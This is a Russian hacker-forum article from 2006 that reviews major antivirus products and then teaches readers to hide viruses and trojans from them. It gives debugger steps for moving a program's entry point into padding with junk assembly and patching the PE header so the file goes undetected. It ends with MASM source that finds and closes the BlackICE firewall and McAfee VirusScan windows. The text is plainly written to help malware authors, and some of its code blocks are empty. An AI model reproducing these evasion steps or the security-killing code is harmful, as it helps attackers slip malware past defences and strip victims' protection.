|
Меню
Сервисы
» ZloY SBot
» IRC канал
» CS Monitor
» Генератор паролей
» Регистрация доменов
Дружественные проекты
Бизнес-сувениры, ежедневники. Рекламные скамейки.
Наборы шоколадных конфет с логотипом вашей фирмы. Сладкие сувениры.
Хостинг фотографий
Статистика
IP: 38.103.63.62
|
Последние сообщения с форума
| » Военкомат), Пехорка_City
| » * No.LimiT *, * плохой *
| | » Угарное видео)), Sheff[WMP]
| » BAT Backdoor, Darvel
| | » Фонарик из карандаша, Skull
| » Как покорить женщину и мужчину, Skull
| | » 5dig, Cyberwolf
| » Как накрутить RapidPoints, kabban
| | » Продам дешёвый аккаунт steam, BOSSZERO
| » сналил челу акк. найти его н..., miles
|
Радио слушают 3 человека. DJ Sklif (ICQ: 396393) с трэком Paul_Van_Dyk - Fritz_Soundgarden-SAT-10-10-2007. Битрейт 32 kbps. ( слушать)
[ ICQ ]
[ &RQ ]
[ QIP ]
[ Miranda ]
[ OCCNET ]
Статьи| Как спрятать вирусы, трояны от антивирусов 05.05.2006 | Автор: 0.p.т.i.ђ.
ICQ: 788897
обсуждение на форуме
<left><font size="+1">Обзор доблестных наших защитников от вирусов</font>
(а простыми словами самых на настоящий момент известных антивирусов)
1)<u>Цель данной статьи:</u> Краткое обозрение антивирусных продуктов известных марок такие как AVP(KAV) он же антивирус Касперского, DrWeb от Питерской команды Игоря Данилова, Norton Antivirus и McAfee Virusscan Pro, остальные попросту не стал перечислять так как в сущности на это нет ни времени не желания, решил брать в основе самые так как сказать именные.
2)их минусы и плюсы.
3)Анализ их уязвимостей и примеры обхода антивирусных средств путём внедрения своего кода в файлы которые будут ими детектироваться как вирусы. </left>
В том какой антивирус на данный момент “ЛУЧШИЙ “или каким лучше пользоваться я советчиком не буду, ибо у каждого есть свои минусы и плюсы. Самым распространённым на настоящий момент является AVP(KAV) , Drweb как я заметил немного реже но оно и понятно , наш доблестный АВП вмещает ,так сказать, на данный момент наибольшее количество записей в антивирусных базах чем к примеру тот же DrWeb (многие думают наверно чем больше базы тем лучше?? Ан нет!!! Не так всё просто ) , Но !!!В сущности надо заметить что наличие баз и их нагромождённость не всегда является гарантией того что все вирусы будут обнаруживаться именно тем у которого базы больше чем к примеру у другого антивируса! Тут важную роль ещё играет сам движок антивирусной программы и встроенный в неё алгоритм детектирования вредоносных программ. К примеру из моих наблюдений стало ясно, что АВП детектировал вирус по его сигнатуре описанной в его базе но стоило её немножко изменить в детектируемом файле как наш покорный слуга надёжно замолкал . То есть из этого становилось понятно что эвристик на АВП просто никакой почти и спасает его столь сильную популярность только обильное содержание записей в базах, не скрою своего уважения к этому антивирусу и их создателям что они всегда и очень своевременно их обновляют! Далее… Рассмотрим его наиближайшего конкурента а именно DrWeb ! Тут записей в базах намного меньше нашего АВП, причём существенно меньше на несколько десяткой тысяч! Но данный антивирус оказался весьма примечателен своей способностью детектирования вредоносных программ почти всех известных тому же АВП, и многие наверно задавали себе этот вопрос ПОЧЕМУ? Как выяснилось DrWeb не создаёт в своих базах лишних модификаций ,но зато он очень хорошо помнит конкретный скажем так почерк или повадку того или иного вируса и детектирует их по ряду признаков относящихся к тому или иному вирусу. Наиглавнейшую роль в этом играет очень мощный эвристический алгоритм встроенный в программу, который позволяет детектировать новые модификации вируса который в его базе имеется в устарелой форме и к примеру не был обновлён на данный момент текущими базами,(но опять же везде есть исключения) их отрицать никогда нельзя! Иными словами АВП спасают базы и DrWeb’a его эвристик. Совсем недавно в программу(DrWeb) были встроены функции процессорного эмулятора, что в очередной раз усложнило задачу крэкерам возможность его обхода путём простого переноса стартовой процедуры в файле. Тут уже приходилось конкретно помучиться и потом обойти отладку пошаговую не так то уж легко. Грубо говоря DrWeb стал эмулировать запуск файла и анализить таким образом вирус он или нет стало гораздо проще, даже если стартовая процедура изменена путём переноса оригинальной OEP на резервную область. Далее …. Norton Antivirus – базы мне показались достаточно не плохими по содержанию (замечу что данный антивирус очень хорошо адаптирован к ловли червей (worms) в остальном напоминает того же Касперского и частично DrWeb но не более ! В целом его обойти достаточно легко … Нужно как правило тока сменить стартовую процедуру и в 99% он перестаёт детектить. Если кто то вдруг захочет разнообразия в выборе на своём ПК разных антивирусных продуктов, то скажу сразу ,что ставить Нортона я бы не рекомендовал только потому что уж очень сильно внедряется в систему и жрёт много ресурсов, но в целом антивирус довольно таки не плохой! Далее ….. McAfee – вот этот антивирус заслуживает таки уважение несомненно ! Обилен базами и так же очень привередлив к ресурсам ,но детектит вирусы абсолютно как выяснилось по другому, не как предыдущие три описанных антивирусных продукта! А именно он в основном не обращает внимание на загрузчик файла, его он интересует в меньшей степени и что самое характерное файл можно изменить до неузнаваемости, то есть сделать его полностью неработоспособным!!!(поработав с ним к примеру в HIEW ,и, покацав загрузчик, даже без отладки )Но!!! Этому антивирусу абсолютно плевать на стартовую процедуру файла и секцию данных, он в основном смотрит на секцию RCRS (ресурсов) , и как правило изменение этой секции приводило к недетектируемости файла этим антивирусом! Замечу только что изменять эту секцию надо очень аккуратно так как малейшая в ней ошибка приводит к неработоспособности файла как такового ! В целом должен заметить что McAfee всегда имеет смысл держать у себя под рукой, так как этот антивирус детектит даже то что было отлажено крэкерами на примере изменения стартовой процедуры или любой другой патчинг загрузчика ! McAfee абсолютно не волнует прыжки OEP или изменения в DATASEG ! Он смотрит проще говоря на ресурсы.
Одним словом скажу так в концовке нашего обзора, что каждый антивирус здесь чем то уникален и нет тут общей панацеи от вирусов! Просто не старайтесь запускать что не попадя и качать неизвестно откуда! Замечу кстати для тех кто балуется просмотров порно-сайтов там вирус или червь словить куда проще чем где бы ни было, даже варезник и то более безопасен чем порно-сайты! Так что поменьше дрочите! И вирусов будет меньше на компе ))))) Таким вроде вижу обзор нынешних положений вещей касаемо выбора продукта защиты от антивирусов! И в заключении дам краткий FAQ для желающий скрыть свои злые троянчики или вирусы от известных мира сего : )) !!!
<font size="+1">2) Скрытие от антивирусов</font>
Для начало неплохо было бы обзавестись такими утилитами как HIEW ( debugger) ,где найти ????Думаю сообразите www.yandex.ru найдется всё
Ладно список данных утилит не велик! В основе 1)голова и руки желательно не кривые 2)HIEW и PE Editor обязательно имхо без них не как! 3)Ну и отладчик естественно, тут вкусов много кто то юзает SoftICE , но я лично рекомендовал бы OllyDebbuger !Эти утилиты вы сможете найти на сайтах крэкерской направленности к примеру www.cracklab.ru - один из самых мною любимых ресурсов! 
И так теперь надо понимать что делаешь и для чего! Первым делом было бы неплохо знать что за вирус (троян) как детектиться и чем упакован (для тех кто в танке не путать с архиваторами), пакуют обычно ASPackom , UPXom, проги написанные на ассемблере пакуют в основном FSG как правило уже версией 2.0 , 1.33 реже !Далее если прога пакована FSG (очень важно) то отладке она поддаётся сложнее так как FSG поганит таблицу импортов , вследствие чего её надо либо восстанавливать , либо распаковывать файл сжатый FSG и пытаться его пожать чем то другим, UPXom не удастся так как запись упаковщика (старого упаковщика ) не удаляется, а ASPacku похуй!
Вот пример:
Открываем HIEW или Olly-Debugger, им же открываешь файл который хочешь править , далее нажимаешь по порядку клавиши F4 F3 F8 и F5 ,выполнил? Если всё верно то знай ты перещёл на OEP (original entry point) отсюда программа начинает свой старт! Если файл упакован UPXom к примеру то первая строчка будет выглядеть приблизительно так, если делать через Ольку (Olly Debugger) , то пользуемся клавишами Pgup или Pgdn
Исходный код:
[/center]
<font color="#0000ff"><font size="+1">PUSHAD 60</font> </font>
В большинстве случаев из этого видно что файл упакован! Далее идут процедуры, но туда тебе пока лезть не надо! Теперь в том же окне нажимай клавишу PAGE DOWN до тех пор пока не попадёшь в резервную область ,выглядеть это будет приблизительно так
Исходный код:
[/center]
Как только появятся эти нули рекомендую не листать особо далеко , чем ближе код тем лучше ,далее пишем там где остановился курсор к примеру PUSH OEP (OEP – orginal entry point тот адрес на котором мы были когда нажимали в HIEW F4 F3 F8 и F5 или Olly Debugger путём нажатия клавиш Ctrl-F2 и будем ассоциировать с данной операндой PUSH таким образом перенося его этой командой в память, а дальше уже вопрос твоей фантазии то что ты хотел был здесь вставить (рекомендую для начала ознакомиться с операндами ассемблера чтобы понимать что делает каждая вписанная тобой операнда) . И после введённой операнды PUSH и адрес (OEP) не забыл? Мы его переносим с оригинальной процедуры на резервную область, то есть в данном случае где ты видишь нули, и дописать после этой команды как я сказал можно что угодно к примеру
Исходный код:
В Olly вставлять код представленный для примера ниже нужно щёлкнуть правой клавишей мыши по отмеченному адресу.
[/center]
в появившемся окошке пишем тот код что указан ниже
[/center]
имейте ввиду в данном окошке указан мною адрес начального старта программы, то есть то место откуда она начинает старт переносим сюда, то есть push 463001 в данном случае
оригинальный адрес программы
и так далее в последующих строчках пишем следующие процедуры перемещаясь курсором к следующему адресу вниз и делая тоже самое, только вписываем уже другой код на примере приведённого внизу и с теми же последовательностями. Далее когда вы выполните все процедура вам надо сохранить сделанные вами изменения в файле
[/center]
<font color="#0000ff">PUSH OEP
Sub eax,ecx тоесть отняли EAX из ECX
Обязательно должно быть возврат иначе будет ошибка при выполнении
Add eax,ecx
Далее Ксорим
Xor eax,ecx уровняли
Далее возвращаемся на исходный код командой RETN
RETN
</font>
Выглядит так
1)пример
Исходный код:
<font color="#0000ff">Push oep
Sub eax,ecx
Add eax,ecx
Xor eax,ecx
Retn </font>
2)пример
Исходный код:
<font color="#0000ff">mov eax,OEP
inc eax увеличили EAX
dec eax уменьшили
jmp eax возврат на исходный код </font>
А теперь для того чтобы прога работала и не выдавала ошибку типо “Дружок а откуда стартовать то теперь??” Берём в руки Pe Tools v1.3 в данном случае и меняем адресацию на ту, которую вы перенесли процедуры в файле, то есть в данном случае 00463001 на 00463545 , 4-твёрку писать не надо в Pe Tools а просто оставляем там ноль, как и стоит, в рамках данной статьи я не могу объяснить почему это так.
[/center]
[/center]
[/center]
Далее сохраняемся и если вы всё правильно сделали, то файл теперь не будет определятся антивирусом в данном случае Касперским там или Нортоном неважно и он будет вполне работоспособен как и прежде  То есть если сделать тоже самое с вирусом или трояном неважно, то он станет невидимым для антивирусов и будет спокойно работать и не будет ими определятся
С DrWeb чуть посложнее но в целом всё так же тока фантазии побольше (но в меру)
Все эти примеры обходят Касперского в два счёта (не детектятся им)
Что то более сложное указывать здесь не стал так как важно понять сам принцип а фантазия как говорится у каждого есть) Главное помните всегда проверяйте свой код отладчиком, так как в этом случае у вас возникнет меньше сложностей с построением своего кода в файл и его отладки!
=================================
А под конец приведу пример программы, убивающей процесс программы, а именно достаточно известного продукта от компании BlackICE.
<u>Исходный код:</u>
<textarea rows=14 cols=60>.586
.model FLAT, STDCALL
OPTION CASEMAP:NONE
ExitProcess PROTO WORD
FindWindowA PROTO WORD,WORD
SendMessageA PROTO WORD,WORD,WORD,WORD
includelib C:masm32libkernel32.lib
includelib C:masm32libuser32.lib
KillProc PROTO WORD
DESTROY EQU 2h
CLOSE EQU 10h
.data
BlackICE DB "BlackICE by Network ICE", 0
BlackICEClass DB "AfxFrameOrView42", 0
McaffeeVS DB "VirusScan", 0
McaffeeVSClass DB "CentralDialogPage", 0
McaffeeVS2 DB "System Scan Status", 0
McaffeeVS2Class DB "#32770", 0
.code
start:
INVOKE FindWindowA, ADDR BlackICEClass, ADDR BlackICE
.IF EAX!=0
INVOKE KillProc, EAX
.ENDIF
INVOKE FindWindowA, ADDR McaffeeVSClass, ADDR McaffeeVS
.IF EAX!=0
INVOKE KillProc, EAX
.ENDIF
INVOKE FindWindowA, ADDR McaffeeVS2, ADDR McaffeeVS2Class
.IF EAX!=0
INVOKE KillProc, EAX
.ENDIF
INVOKE ExitProcess, 0
KillProc hWndWORD
INVOKE SendMessageA, hWnd, CLOSE, 0, 0
INVOKE SendMessageA, hWnd, DESTROY, 0, 0
KillProc ENDP
END start </textarea>
Конечно можно найти и аналогичные применения данного приёма с другими продуктами, но для этого вам потребуется знания названий процессов антивирусов или файерволлов. [center]
| Автор: Venom[иКс]бывалый ![Venom[иКс]](http://forum.zloy.org/image.php?u=260) Сообщений: 739 |
комментариев нет
|
